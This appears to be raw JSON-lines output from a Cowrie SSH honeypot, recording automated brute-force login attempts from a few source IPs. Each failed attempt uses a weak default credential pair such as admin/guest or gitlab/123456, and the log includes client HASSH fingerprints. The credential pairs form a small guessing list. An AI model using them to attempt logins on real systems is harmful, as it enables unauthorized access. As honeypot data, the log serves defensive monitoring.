{"eventid":"cowrie.login.failed","username":"admin","password":"guest","message":"login attempt [admin/guest] failed","sensor":"my-vps","timestamp":"2025-08-28T03:23:00.667657Z","src_ip":"212.227.235.229","session":"0839a354e118"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:23:01.798625Z","src_ip":"212.227.235.229","session":"0839a354e118"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37864,"dst_ip":"1.2.3.4","dst_port":22,"session":"5330e0fcfcaa","protocol":"ssh","message":"New connection: 212.227.125.160:37864 (1.2.3.4:22) [session: 5330e0fcfcaa]","sensor":"my-vps","timestamp":"2025-08-28T03:23:04.770735Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:23:04.771629Z","src_ip":"212.227.125.160","session":"5330e0fcfcaa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:23:04.990553Z","src_ip":"212.227.125.160","session":"5330e0fcfcaa"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:23:05.650109Z","src_ip":"212.227.125.160","session":"5330e0fcfcaa"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:23:06.874358Z","src_ip":"212.227.125.160","session":"5330e0fcfcaa"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":17247,"dst_ip":"1.2.3.4","dst_port":22,"session":"e24838ad95bd","protocol":"ssh","message":"New connection: 45.125.211.194:17247 (1.2.3.4:22) [session: e24838ad95bd]","sensor":"my-vps","timestamp":"2025-08-28T03:23:12.683536Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:23:12.705104Z","src_ip":"45.125.211.194","session":"e24838ad95bd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:23:12.905682Z","src_ip":"45.125.211.194","session":"e24838ad95bd"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"123456","message":"login attempt [gitlab/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:23:13.731553Z","src_ip":"45.125.211.194","session":"e24838ad95bd"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:23:14.944017Z","src_ip":"45.125.211.194","session":"e24838ad95bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58740,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad7ae71e4589","protocol":"ssh","message":"New connection: 212.227.125.160:58740 (1.2.3.4:22) [session: ad7ae71e4589]","sensor":"my-vps","timestamp":"2025-08-28T03:23:16.143525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:23:16.144305Z","src_ip":"212.227.125.160","session":"ad7ae71e4589"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:23:16.363824Z","src_ip":"212.227.125.160","session":"ad7ae71e4589"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"123456","message":"login attempt [sonar/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:23:17.024173Z","src_ip":"212.227.125.160","session":"ad7ae71e4589"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:23:18.246028Z","src_ip":"212.227.125.160","session":"ad7ae71e4589"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40948,"dst_ip":"1.2.3.4","dst_port":22,"session":"315de8ae2b5b","protocol":"ssh","message":"New connection: 212.227.125.160:40948 (1.2.3.4:22) [session: 315de8ae2b5b]","sensor":"my-vps","timestamp":"2025-08-28T03:23:21.925812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:23:21.926648Z","src_ip":"212.227.125.160","session":"315de8ae2b5b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:23:22.143519Z","src_ip":"212.227.125.160","session":"315de8ae2b5b"}
{"eventid":"cowrie.login.failed","username":"jumpserver","password":"jumpserver","message":"login attempt [jumpserver/jumpserver] failed","sensor":"my-vps","timestamp":"2025-08-28T03:23:22.792817Z","src_ip":"212.227.125.160","session":"315de8ae2b5b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:23:24.010975Z","src_ip":"212.227.125.160","session":"315de8ae2b5b"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":36354,"dst_ip":"1.2.3.4","dst_port":22,"session":"397d811b7573","protocol":"ssh","message":"New connection: 45.125.211.194:36354 (1.2.3.4:22) [session: 397d811b7573]","sensor":"my-vps","timestamp":"2025-08-28T03:23:27.514303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:23:27.530627Z","src_ip":"45.125.211.194","session":"397d811b7573"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51388,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcedab842e79","protocol":"ssh","message":"New connection: 212.227.125.160:51388 (1.2.3.4:22) [session: bcedab842e79]","sensor":"my-vps","timestamp":"2025-08-28T03:23:27.726817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:23:27.735256Z","src_ip":"212.227.125.160","session":"bcedab842e79"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:23:27.756807Z","src_ip":"45.125.211.194","session":"397d811b7573"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:23:27.946075Z","src_ip":"212.227.125.160","session":"bcedab842e79"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-28T03:23:28.618759Z","src_ip":"45.125.211.194","session":"397d811b7573"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom123","message":"login attempt [tom/tom123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:23:28.822599Z","src_ip":"212.227.125.160","session":"bcedab842e79"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:23:29.841606Z","src_ip":"45.125.211.194","session":"397d811b7573"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:23:30.042822Z","src_ip":"212.227.125.160","session":"bcedab842e79"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34040,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b570ea77643","protocol":"ssh","message":"New connection: 212.227.235.229:34040 (1.2.3.4:22) [session: 2b570ea77643]","sensor":"my-vps","timestamp":"2025-08-28T03:23:30.549119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:23:30.549966Z","src_ip":"212.227.235.229","session":"2b570ea77643"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:23:30.801134Z","src_ip":"212.227.235.229","session":"2b570ea77643"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom123","message":"login attempt [tom/tom123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:23:31.556926Z","src_ip":"212.227.235.229","session":"2b570ea77643"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:23:32.810433Z","src_ip":"212.227.235.229","session":"2b570ea77643"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44034,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc02e511c715","protocol":"ssh","message":"New connection: 212.227.125.160:44034 (1.2.3.4:22) [session: cc02e511c715]","sensor":"my-vps","timestamp":"2025-08-28T03:23:39.570486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:23:39.571401Z","src_ip":"212.227.125.160","session":"cc02e511c715"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:23:39.783829Z","src_ip":"212.227.125.160","session":"cc02e511c715"}
{"eventid":"cowrie.login.failed","username":"git","password":"git123","message":"login attempt [git/git123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:23:40.421052Z","src_ip":"212.227.125.160","session":"cc02e511c715"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:23:41.635932Z","src_ip":"212.227.125.160","session":"cc02e511c715"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":65142,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c3fe42261f4","protocol":"ssh","message":"New connection: 45.125.211.194:65142 (1.2.3.4:22) [session: 7c3fe42261f4]","sensor":"my-vps","timestamp":"2025-08-28T03:23:42.499716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:23:42.519815Z","src_ip":"45.125.211.194","session":"7c3fe42261f4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:23:42.710808Z","src_ip":"45.125.211.194","session":"7c3fe42261f4"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-28T03:23:43.539275Z","src_ip":"45.125.211.194","session":"7c3fe42261f4"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:23:44.749577Z","src_ip":"45.125.211.194","session":"7c3fe42261f4"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":26208,"dst_ip":"1.2.3.4","dst_port":22,"session":"511b00a4c219","protocol":"ssh","message":"New connection: 45.125.211.194:26208 (1.2.3.4:22) [session: 511b00a4c219]","sensor":"my-vps","timestamp":"2025-08-28T03:23:57.236974Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:23:57.288315Z","src_ip":"45.125.211.194","session":"511b00a4c219"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:23:57.447406Z","src_ip":"45.125.211.194","session":"511b00a4c219"}
